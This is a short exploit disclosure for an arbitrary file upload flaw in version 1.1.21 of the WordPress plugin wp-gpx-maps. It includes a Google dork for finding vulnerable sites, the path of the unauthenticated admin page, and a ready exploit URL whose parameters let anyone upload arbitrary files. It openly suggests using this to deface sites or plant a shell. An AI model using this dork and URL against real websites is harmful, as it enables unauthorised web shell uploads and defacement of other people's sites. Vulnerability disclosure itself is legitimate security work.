########################################################### # # Exploit Title: WordPress wp-gpx-map version 1.1.21 Arbitrary File Upload # Google Dork: inurl:wp-content/plugins/wp-gpx-maps/ # Date: 11/05/2012 # Exploit Author: Adrien Thierry # Vendor Homepage: http://www.darwinner.it/ # Software Link: http://downloads.wordpress.org/plugin/wp-gpx-maps.1.1.21.zip # Version: 1.1.21 # ########################################################### Vuln page : http://mysite.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php exploit : Go to url : http://my-site.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=// And you can upload what you want. You could change file path with target_path (deface, shell etc...) #####################################################################Брой прочитания на тази страница: 993
WordPress wp-gpx-map version 1.1.21 Arbitrary File Upload Vulnerability